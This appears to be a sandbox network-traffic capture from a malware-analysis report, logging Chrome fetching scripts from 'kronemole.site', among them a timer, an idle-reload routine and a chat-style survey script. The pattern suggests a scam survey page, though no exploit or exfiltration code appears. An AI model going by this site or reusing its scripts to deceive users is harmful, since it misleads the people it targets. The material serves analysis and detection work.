                                                                          2023-11-21 16:58:41 UTC536INData Raw: 21 34 8d ce 29 78 c6 99 9e c6 80 fb 14 32 17 e3 09 54 6d f1 fd e8 e2 3d a9 f3 41 61 45 ee d0 50 bc 9b 63 66 2d fb 3a bb 36 af 50 45 d4 38 c6 2a 09 ae 69 f7 84 5c 23 b6 4a d8 98 f4 ae 11 a3 dc 25 bb 3c c5 36 9b 58 a6 75 70 2b 1c f6 d2 e7 c3 15 be f9 2f 69 de 20 64 42 32 bd 5f 85 42 59 69 f3 b9 36 7f bc ae 1c 6a 6f 10 a4 4e 52 a5 c7 7d 64 8c 32 0e 7f 69 9f 95 d2 57 b1 86 03 1c d6 90 ff 9c c5 bd 4a 65 ad a0 5c 1a 34 45 c5 68 56 71 63 ac dc a8 21 9f e5 64 94 22 c6 51 dd 70 74 16 c9 8d b1 8d fe e9 63 fb f6 65 15 67 d2 e2 da 77 69 f0 42 90 75 63 61 92 2f 63 0b 3c f7 c5 65 65 64 00 2c 27 0b 37 54 18 ad 95 49 38 93 49 b7 97 90 34 46 33 03 b8 ae 39 1c 71 b3 58 02 da 1c ea 30 63 0d 63 38 31 f7 48 6c ec 91 1f 9e 2b d6 8b 54 a9 52 5c 2e da d0 03 2f ad f3 b5 bb 59 95
                                                                          Data Ascii: !4)x2Tm=AaEPcf-:6PE8*i\#J%<6Xup+/i dB2_BYi6joNR}d2iWJe\4EhVqc!d"QptcegwiBuca/c<eed,'7TI8I4F39qX0cc81Hl+TR\./Y
                                                                          2023-11-21 16:58:41 UTC537INData Raw: be ea 60 c5 11 4c 6f e4 26 cc d9 7b b3 10 89 01 b4 59 35 8f 5c 8e a5 9c 42 09 b2 ad a2 76 a3 e9 48 7a e5 9e 66 85 98 b8 81 67 22 bb 13 d2 ca ce 8a ab 63 76 e6 1c 89 09 68 86 a1 28 a2 13 59 55 5a c5 2d 71 bf 8e 53 c9 57 da bc 99 41 77 95 6f 47 f2 30 23 e2 a9 b1 c3 f8 b7 e4 65 d0 56 b8 3d 71 dc 4e 04 c1 cb a4 a9 70 d9 89 fe 7b f6 e4 eb 57 7b b0 34 0d 0c 96 c7 cc 94 df 35 9c e8 1f 8d 93 01 9d 80 a7 81 65 48 70 9b 83 6a df e0 72 d9 73 15 e6 81 a7 e2 a7 07 0f be 16 bf 96 5e 46 07 7e 37 41 ab 56 49 4f 92 d8 6a f8 d5 08 28 c3 2f e8 bd 34 74 19 5a 4d 3b a0 58 57 27 19 f4 fb bd ed 10 6f dd 72 31 d4 75 4e cf e2 a6 49 bd 7c 8d ac 1f cd 8f 81 f5 1e 4b 5f 6d 1a bc 17 c1 1f 84 c0 14 e5 ff 22 29 da b2 fb 62 8f d8 e8 38 56 70 15 f3 34 43 c0 38 cd 5c 55 e5 99 c1 fa 9a fa
                                                                          Data Ascii: `Lo&{Y5\BvHzfg"cvh(YUZ-qSWAwoG0#eV=qNp{W{45eHpjrs^F~7AVIOj(/4tZM;XW'or1uNI|K_m")b8Vp4C8\U
                                                                          2023-11-21 16:58:41 UTC541INData Raw: 35 e2 0a 2d 65 75 f1 df 3c 96 f9 b2 f2 91 3d f5 79 ac b5 f4 35 32 25 d6 38 fd 4d 74 75 65 e5 21 32 4b a1 bf 9f cb c7 26 2a c7 5c aa a1 44 ce ac ac 1c ae a7 36 64 c4 fd 1b d8 af 8b 22 b2 5d 2c ec ce 84 37 25 3c 7f 1e da 08 2f ef 16 8a 21 ef 37 74 9c f4 8d 1a 7f 98 f5 3e e7 f5 63 bc 9d 57 25 94 9f 0f a4 f3 43 ae 1b a4 06 f9 d8 24 20 2a a1 44 5c ab 0b bf ac 19 38 81 cf 75 4a 07 25 5f 01 35 1b 5f 76 14 9f 4f db cf 62 e7 af 5c 60 92 cf 8c 56 95 4d 3f bb 3d 74 34 a5 f8 12 2a 9d 13 6f 28 31 a7 ce 1c 71 14 57 67 d5 e6 ce 4f e4 2e 66 04 6f ca d2 bf 69 2b 36 05 33 16 27 72 73 e7 6b ad 9b 8c 91 fb 87 70 97 01 04 11 4b 4a 43 21 5e 36 8f b8 18 6c 77 b0 71 60 47 67 f9 a3 15 24 05 5a d1 ff 13 f0 4b b2 1a e2 ca 99 3b 94 dd 85 a2 00 7e e9 89 5f 67 fe b0 c4 02 fa 8f cd 79
                                                                          Data Ascii: 5-eu<=y52%8Mtue!2K&*\D6d"],7%</!7t>cW%C$ *D\8uJ%_5_vOb\`VM?=t4*o(1qWgO.foi+63'rskpKJC!^6lwq`Gg$ZK;~_gy
                                                                          2023-11-21 16:58:41 UTC545INData Raw: a7 4a 55 b8 e2 5b 58 2b cb b8 d9 75 f7 61 33 de 9d 2a 6e 53 ee 1c 9c 57 7d 12 3a 29 09 4e e5 fe df c3 40 bd 11 19 20 ad 93 1c 21 0d 0c 58 de 66 e0 a3 11 21 73 a6 bd 7e c2 11 bf 71 25 aa 8d f2 1c 5b 84 b0 43 04 fc c4 27 3a bb 3a 61 09 2a 82 e9 ab 02 8a 3d df e8 2d 4a fd 3e 9b f8 1f 6d ec bf 8c 2d c3 57 a7 50 f2 e7 4c d4 2f 2d ed 9c 9b 12 1e 5c db 5e 28 96 6e 6b b4 4b 54 e6 95 e0 b2 b0 00 f3 13 46 48 dc 7d 02 bb c0 fc 81 55 b1 4f a7 cb b6 36 75 1b 90 8e 2c 74 4d b2 0e 64 4a c8 6d 1b a2 00 2a 88 75 63 8f 58 19 fc 32 c8 8b 15 5f a8 cf 1a ee 0d 57 15 7c 5f 29 42 0b d8 a6 59 73 0f cf 55 76 07 11 26 d5 31 a1 9b 94 66 41 33 65 19 8e 27 23 f3 e4 ba e2 60 c5 a6 03 de 84 98 84 90 c4 39 36 a6 41 48 57 a6 b7 aa cf f9 9a 9b c7 53 8e 15 cb 52 32 db ef 9f 9b c9 86 07 31
                                                                          Data Ascii: JU[X+ua3*nSW}:)N@ !Xf!s~q%[C'::a*=-J>m-WPL/-\^(nkKTFH}UO6u,tMdJm*ucX2_W|_)BYsUv&1fA3e'#`96AHWSR21
                                                                          2023-11-21 16:58:41 UTC549INData Raw: 5d 78 ec 7f 6e f0 0c 72 c7 bd f7 c5 93 76 6d 88 ff b4 af e3 8c 51 a7 12 55 d4 49 4c 31 d5 d8 b8 f4 a6 d0 7d e2 7a 4e 79 6a fc 4c e8 7f 0c a3 be 9f 64 48 10 00 a3 4f 4f c4 4c 1c a8 f9 48 ef d3 41 8d 6f 50 11 a8 cc 5b 2a 1c ec e1 a2 d5 d2 82 68 28 c0 2b 55 cf da 84 61 08 d9 e5 6c dc f7 b5 98 a7 d5 2b 6c 81 58 6f 0b 5c 42 98 c1 73 f7 21 2b cb a3 09 0c b2 3d 0a ee 42 d1 f9 cd f9 ab a2 35 41 ce 08 65 d6 a5 59 af 5f ee 4f f4 bf e7 bb 05 a3 c1 65 dd 77 0b a4 57 c3 ee ab e0 6b d3 0b 15 05 a6 a5 be 27 a5 8f 6e dd 2a f4 8f 54 1e c1 46 f6 d1 74 52 7a 6a 5a ff 40 f9 c0 00 fc d0 8a 39 79 79 61 01 ad ef 2d 34 ca 93 b2 6b 28 33 c3 66 b6 50 4e 51 91 cb 86 c3 86 4b 50 e2 23 dd ac 61 c3 9a f9 1c 6d 5e db 36 e9 9a c5 01 05 ed 2a 0f 55 1c 34 3a a6 07 14 c8 ed 09 57 b9 b8 fb
                                                                          Data Ascii: ]xnrvmQUIL1}zNyjLdHOOLHAoP[*h(+Ual+lXo\Bs!+=B5AeY_OewWk'n*TFtRzjZ@9yya-4k(3fPNQKP#am^6*U4:W
                                                                          2023-11-21 16:58:41 UTC554INData Raw: b4 04 06 da 9f 66 5c 1a e5 62 f0 25 67 2d 50 7d b9 2f c2 14 55 7b b5 3a 31 7f 6e 68 1c 8a 4d 30 ab c5 7a 04 d8 e5 0c 8a f5 ea 04 33 79 6f c1 77 b0 15 ed ba 11 01 d8 ff 19 07 a0 f2 10 08 26 c2 3f 42 70 16 3b 90 07 60 ab 8f 0d f0 88 81 6a 2e 89 d4 f6 92 7c 32 7c 5e da b9 7e a2 e9 4b 9f 93 29 91 d2 0f 2e 04 50 c6 ff a0 96 46 93 a9 79 14 bc 87 23 6c 36 99 9a 7c 9b 64 c4 1e 81 73 b4 f4 93 c5 14 d1 2c 6e 36 4c e7 24 16 1f ef 17 d2 80 d1 08 bc 7d fa b7 6d 5b 37 01 3d e2 b3 86 d3 ee 30 c8 cd cd ca 6e e1 af 8b c5 c2 33 73 4b ae 83 97 63 a1 18 98 e4 a8 46 ac 14 f8 83 ed 71 09 ba 8f a8 74 bb ba 8e c3 63 41 0e a6 c9 14 22 41 1f 72 ef 91 45 da ad 4e 32 b8 0c e2 40 97 1e a4 5c 99 a9 f1 4c d1 cc 90 af 16 a7 b5 ab 9c 69 5b b8 e9 fb da b8 b9 df 25 2e 12 b9 ab a8 86 dc bc
                                                                          Data Ascii: f\b%g-P}/U{:1nhM0z3yow&?Bp;`j.|2|^~K).PFy#l6|ds,n6L$}m[7=0n3sKcFqtcA"ArEN2@\Li[%.
                                                                          2023-11-21 16:58:41 UTC558INData Raw: 26 94 71 21 15 55 d3 0d d3 b2 1d d7 f3 83 30 8a 93 34 cb 8b b2 aa 9b b6 eb 87 71 9a 97 75 db 8f 13 04 86 40 61 70 04 12 85 c6 60 71 78 02 91 44 a6 50 69 74 06 93 c5 e6 70 79 7c 81 50 24 96 48 65 72 45 38 7d 51 a9 35 5a 9d de 60 34 05 f5 ab c5 6a b3 3b 9c 2e 37 77 0f 4f 2f 6f 1f 04 c5 70 82 a4 68 86 e5 78 41 94 64 45 d5 74 c3 b4 6c c7 f5 fc 20 8c e2 24 cd f2 a2 ac ea a6 ed fa 61 9c e6 65 dd 76 fb c3 f1 74 be 5c 6f f7 c7 f3 f5 04 20 c2 84 32 2e a4 a2 6a ba 61 5a b6 e3 7a 7e 10 46 71 92 66 79 51 56 75 d3 76 fd 30 4e f3 b2 6e fb d1 5e eb 63 ae 7d 3c 52 05 d1 24 c9 28 aa a6 1b a6 65 3b ae e7 03 88 30 a1 8c 0b a9 a8 9a 6e 98 96 ed b8 9e 1f 84 51 9c a4 59 5e 94 55 dd b4 5d 3f 8c d3 bc ac db 7e 9c 20 30 04 0a 83 23 90 28 34 06 8b c3 13 88 24 32 85 4a a3 33 98 2c
                                                                          Data Ascii: &q!U04qu@ap`qxDPitpy|P$HerE8}Q5Z`4j;.7wO/ophxAdEtl $aevt\o 2.jaZz~FqfyQVuv0Nn^c}<R$(e;0nQY^U]?~ 0#(4$2J3,
                                                                          2023-11-21 16:58:41 UTC562INData Raw: e8 45 a1 48 be 8e 5f c8 14 b2 4b 05 a7 dc 27 60 9b 2d 55 f8 7a 95 08 c3 41 11 a2 be 73 58 cc 49 df 44 2a 6e e7 f1 17 ed 0d 8d 6d 0d ac 27 d3 c2 6d 45 46 d0 19 ed d4 08 62 eb 11 2b e7 98 51 1f bf a4 c5 79 a8 2c 39 c0 1f 76 a0 ee 18 57 dc 14 bf f4 0f 4d 50 fc f5 d9 48 89 50 49 4e 91 d6 cc d3 16 6b 11 75 0f 0e f4 e6 ba ee e3 54 dc 83 63 37 0c 8c 15 4b f3 62 2a f7 97 4f 19 f3 ee 4e 14 66 0b 6f e0 13 db 77 a0 24 ec 87 f4 ef 7c 47 dd 86 40 61 e0 e6 ad 0b 4a 55 5c db b0 fd ff 49 7f 3d c7 3d 61 8e 2f d4 82 52 6c 0f 5a a7 f4 47 26 82 d6 1c 7d ac b6 96 a3 49 33 b7 8b 0c f8 9b 4e cd 97 00 85 e2 dd 20 c9 c2 a7 15 65 f1 3e 50 da 42 89 31 33 ce d9 01 8e 9b 3d 8c 07 8e ab b4 28 3e af db 42 1a 09 a4 c8 62 6f 67 57 72 6f c5 4f 49 03 ee 82 b9 e6 93 42 9d b5 36 4a af 51 0a
                                                                          Data Ascii: EH_K'`-UzAsXID*nm'mEFb+Qy,9vWMPHPINkuTc7Kb*ONfow$|G@aJU\I==a/RlZG&}I3N e>PB13=(>BbogWroOIB6JQ
                                                                          2023-11-21 16:58:41 UTC562INData Raw: 7e f8 dd 6f 3b c1 97 18 54 b4 9a 86 f1 bc 96 05 4a 61 23 0a 66 1a 58 75 c5 eb 71 55 c3 59 b3 5b c2 b4 e2 5a 22 0b 0f 69 1b 05 92 f6 ca 08 b5 05 ad ea 66 6f c9 56 98 cc c5 9c f4 1b eb 50 71 a7 99 5e 7b 3f b6 18 cb f7 c7 06 26 a5 be ad 95 54 c8 43 d7 cb 6d a6 c8 a7 24 88 d4 53 a8 f9 44 b1 8d 2e 28 53 df 5a eb 41 e3 b8 7f 9d 21 21 fb 5e 79 60 70 7d ef e2 a8 f3 f8 fd 38 e0 aa 1b c9 44 9a f9 ea 83 cc 89 5d ec df 15 38 31 75 d7 56 22 93 85 eb 91 6b 6d 43 ee 24 5d 74 06 b7 0f 13 a9 0c 5c 73 09 15 9d 1f 02 e4 5b ee 03 e0 c4 5c 9c ee 93 46 50 d9 da 01 2f 28 f6 d0 fe 5d e9 f0 84 de 31 ad a7 22 1f 5a ee 17 6e 6b 2a b1 45 52 c9 eb 0d 87 cd 18 f5 dd e9 10 01 20 0b 85 1d a5 5f ee 74 70 7d 87 a2 64 6a 89 f7 5b 87 72 65 6b 9c bd b7 d2 8e a1 f4 c0 88 55 e6 de ae 68 28 6e
                                                                          Data Ascii: ~o;TJa#fXuqUY[Z"ifoVPq^{?&TCm$SD.(SZA!!^y`p}8D]81uV"kmC$]t\s[\FP/(]1"Znk*ER _tp}dj[rekUh(n


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.449755104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:40 UTC474OUTGET /assets/js/functions.js?v=3cc6aa721bc3b8a31b45d9388214360e HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:41 UTC482INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:41 GMT
                                                                          Content-Type: application/javascript
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:41 GMT
                                                                          last-modified: Fri, 25 Aug 2023 14:17:59 GMT
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: MISS
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2%2Fdi2iqAGbCZlF3pMk1bgL52by3V8eZAQTnArnSN4bRBBBoXhlUDfJcuch%2F%2FzgyvW7TCNuGFaMdxAmJkm77Dc673CkJCS0Q2EzOieZGTxkBt%2BqhIrVQQF81EiiPSOwKt%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a966892579a-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:41 UTC483INData Raw: 33 32 65 0d 0a 0a 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 74 54 69 6d 65 72 28 64 75 72 61 74 69 6f 6e 29 20 7b 0a 20 20 76 61 72 20 74 69 6d 65 72 20 3d 20 64 75 72 61 74 69 6f 6e 2c 20 6d 69 6e 75 74 65 73 2c 20 73 65 63 6f 6e 64 73 3b 0a 20 20 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 6d 69 6e 75 74 65 73 20 3d 20 70 61 72 73 65 49 6e 74 28 74 69 6d 65 72 20 2f 20 36 30 2c 20 31 30 29 3b 0a 20 20 20 20 73 65 63 6f 6e 64 73 20 3d 20 70 61 72 73 65 49 6e 74 28 74 69 6d 65 72 20 25 20 36 30 2c 20 31 30 29 3b 0a 0a 20 20 20 20 6d 69 6e 75 74 65 73 20 3d 20 6d 69 6e 75 74 65 73 20 3c 20 31 30 20 3f 20 22 22 20 2b 20 6d 69 6e 75 74 65 73 20 3a 20 6d 69 6e 75 74 65 73 3b 0a 20 20 20 20 73 65 63 6f 6e 64 73 20 3d 20
                                                                          Data Ascii: 32efunction startTimer(duration) { var timer = duration, minutes, seconds; setInterval(function() { minutes = parseInt(timer / 60, 10); seconds = parseInt(timer % 60, 10); minutes = minutes < 10 ? "" + minutes : minutes; seconds =
                                                                          2023-11-21 16:58:41 UTC483INData Raw: 69 6d 65 20 3d 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 3b 0a 09 24 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 62 69 6e 64 28 27 6d 6f 75 73 65 6d 6f 76 65 20 6b 65 79 70 72 65 73 73 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 0a 09 09 74 69 6d 65 20 3d 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 3b 0a 09 7d 29 3b 0a 09 66 75 6e 63 74 69 6f 6e 20 72 65 66 72 65 73 68 28 29 7b 0a 09 09 69 66 28 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 20 2d 20 74 69 6d 65 20 3e 3d 20 33 30 30 30 30 29 20 0a 09 09 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3b 0a 09 09 65 6c 73 65 20 0a 09 09 09 73 65 74 54 69 6d 65 6f 75 74 28 72 65 66 72 65 73 68 2c 20 31 30 30 30
                                                                          Data Ascii: ime = new Date().getTime();$(document.body).bind('mousemove keypress', function(e){time = new Date().getTime();});function refresh(){if(new Date().getTime() - time >= 30000) window.location.reload(true);else setTimeout(refresh, 1000
                                                                          2023-11-21 16:58:41 UTC484INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.449756104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:40 UTC475OUTGET /assets/js/intl_functions.js?v=3cc6aa721bc3b8a31b45d9388214360e HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:41 UTC478INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:41 GMT
                                                                          Content-Type: application/javascript
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:41 GMT
                                                                          last-modified: Thu, 14 Sep 2023 15:07:29 GMT
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: MISS
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JlgefG2cgAyL9vIKj2jSgHSbxyxDxbhuwbaOL49AoW%2BXRqfKkxgAKVxZ%2BNjDczfCoJem3mdsP3clVsb%2Bxm54jsYOBK8pexbso%2BjFVDeQZHkzKCxQ8ual1iBxxkSFYdjnkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a9678110a0d-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:41 UTC478INData Raw: 65 33 37 0d 0a 6c 65 74 20 6f 5f 73 75 72 76 65 79 20 3d 20 6e 75 6c 6c 3b 0a 6c 65 74 20 73 5f 73 74 65 70 20 3d 20 30 3b 0a 6c 65 74 20 6c 61 73 74 51 75 65 73 74 69 6f 6e 20 3d 20 22 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 74 49 4e 54 53 75 72 76 65 79 28 73 69 64 29 7b 0a 09 24 28 27 2e 63 6f 6e 74 69 6e 75 65 27 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 27 6f 6e 63 6c 69 63 6b 27 29 3b 0a 09 24 2e 61 6a 61 78 28 7b 0a 09 09 74 79 70 65 3a 20 22 50 4f 53 54 22 2c 0a 09 09 75 72 6c 3a 20 22 22 2c 0a 09 09 64 61 74 61 3a 20 27 5f 74 79 70 65 3d 61 6a 61 78 26 5f 61 63 74 69 6f 6e 3d 6d 61 73 74 65 72 2d 67 65 74 49 4e 54 53 75 72 76 65 79 26 72 49 64 3d 27 2b 73 69 64 2c 0a 09 09 73 75 63 63 65 73 73 3a 20 66 75 6e 63 74 69 6f 6e 20 28 72 29 20 7b
                                                                          Data Ascii: e37let o_survey = null;let s_step = 0;let lastQuestion = "";function startINTSurvey(sid){$('.continue').removeAttr('onclick');$.ajax({type: "POST",url: "",data: '_type=ajax&_action=master-getINTSurvey&rId='+sid,success: function (r) {
                                                                          2023-11-21 16:58:41 UTC479INData Raw: 2e 73 68 6f 77 28 29 3b 0a 09 09 09 09 09 69 6e 73 65 72 74 43 68 61 74 28 67 72 65 65 74 69 6e 67 29 3b 0a 09 09 09 09 09 69 6e 73 65 72 74 43 68 61 74 28 22 3c 76 69 64 65 6f 20 63 6c 61 73 73 3d 27 67 69 66 27 20 61 75 74 6f 70 6c 61 79 20 6c 6f 6f 70 20 6d 75 74 65 64 20 70 6c 61 79 73 69 6e 6c 69 6e 65 3e 3c 73 6f 75 72 63 65 20 73 72 63 3d 27 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 67 72 65 65 74 69 6e 67 2e 77 65 62 6d 27 20 74 79 70 65 3d 27 76 69 64 65 6f 2f 77 65 62 6d 27 3e 3c 2f 76 69 64 65 6f 3e 22 2c 20 31 32 30 30 2c 20 66 61 6c 73 65 2c 20 74 72 75 65 29 0a 09 09 09 09 09 69 6e 73 65 72 74 43 68 61 74 28 67 72 65 65 74 69 6e 67 32 2c 20 32 34 30 30 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 09 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74
                                                                          Data Ascii: .show();insertChat(greeting);insertChat("<video class='gif' autoplay loop muted playsinline><source src='assets/images/greeting.webm' type='video/webm'></video>", 1200, false, true)insertChat(greeting2, 2400, true);setTimeout(funct
                                                                          2023-11-21 16:58:41 UTC480INData Raw: 24 28 22 23 64 76 2d 63 68 6f 69 63 65 73 22 29 2e 73 68 6f 77 28 29 3b 0a 09 09 24 28 27 23 71 75 65 73 74 69 6f 6e 42 6f 64 79 27 29 2e 68 74 6d 6c 28 27 27 29 2e 73 68 6f 77 28 29 3b 0a 09 09 24 28 22 2e 73 70 72 6f 67 72 65 73 73 62 61 72 22 29 2e 73 68 6f 77 28 29 3b 0a 09 09 6c 65 74 20 71 73 20 3d 20 6f 5f 73 75 72 76 65 79 2e 71 75 65 73 74 69 6f 6e 73 5b 6b 71 75 65 73 74 69 6f 6e 73 5b 73 5f 73 74 65 70 20 2d 20 31 5d 5d 3b 0a 09 09 24 28 27 23 71 75 65 73 74 69 6f 6e 54 65 78 74 27 29 2e 68 74 6d 6c 28 71 73 2e 6e 61 6d 65 29 3b 0a 09 09 0a 09 09 2f 2f 62 61 72 63 65 6c 6f 6e 61 2c 61 70 72 69 6c 69 61 0a 09 09 69 66 20 28 74 79 70 65 6f 66 20 71 75 65 73 74 69 6f 6e 74 78 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 0a 09 09 09 24
                                                                          Data Ascii: $("#dv-choices").show();$('#questionBody').html('').show();$(".sprogressbar").show();let qs = o_survey.questions[kquestions[s_step - 1]];$('#questionText').html(qs.name);//barcelona,apriliaif (typeof questiontx !== 'undefined') {$
                                                                          2023-11-21 16:58:41 UTC482INData Raw: 28 27 23 71 75 65 73 74 69 6f 6e 42 6f 64 79 27 29 2e 61 70 70 65 6e 64 28 60 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 61 6e 73 77 65 72 4f 70 74 69 6f 6e 20 62 74 6e 5f 63 6f 6c 6f 72 20 62 74 6e 5f 68 63 6f 6c 6f 72 20 62 74 6e 5f 68 74 63 6f 6c 6f 72 20 62 74 6e 5f 74 78 63 6f 6c 6f 72 20 62 75 74 74 6f 6e 20 62 74 6e 2d 74 78 20 62 68 2d 63 6f 6c 6f 72 20 62 74 78 68 2d 63 6f 6c 6f 72 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 32 70 78 3b 22 3e 60 2b 76 2b 60 3c 2f 62 75 74 74 6f 6e 3e 60 29 3b 0a 09 09 09 7d 29 3b 0a 09 09 09 24 28 22 2e 61 6e 73 77 65 72 4f 70 74 69 6f 6e 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 6c 61 73 74 51 75 65 73 74 69 6f 6e 20 3d 20 24 28
                                                                          Data Ascii: ('#questionBody').append(`<button class="answerOption btn_color btn_hcolor btn_htcolor btn_txcolor button btn-tx bh-color btxh-color" style="margin-right: 2px;">`+v+`</button>`);});$(".answerOption").on("click", function () {lastQuestion = $(
                                                                          2023-11-21 16:58:41 UTC482INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.449758104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:41 UTC476OUTGET /assets/js/isp/common.js?v=3cc6aa721bc3b8a31b45d9388214360e HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:41 UTC565INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:41 GMT
                                                                          Content-Type: application/javascript
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:41 GMT
                                                                          last-modified: Thu, 16 Nov 2023 20:23:21 GMT
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: MISS
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4OPtA5r99a3nSfVRxvQNP6t656CtUvesm0T6s%2BzYa3lHMyaGC1ev3%2BaI%2FGOuMzejiFI2DlmQqUZviKnyZ21yVBnpdM%2BVPpttawGOlKQ7iSwzHYStX48PW8PYOkCQOnSuhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a978f3528c8-IAD
                                                                          alt-svc: h3=":443"; ma=86400
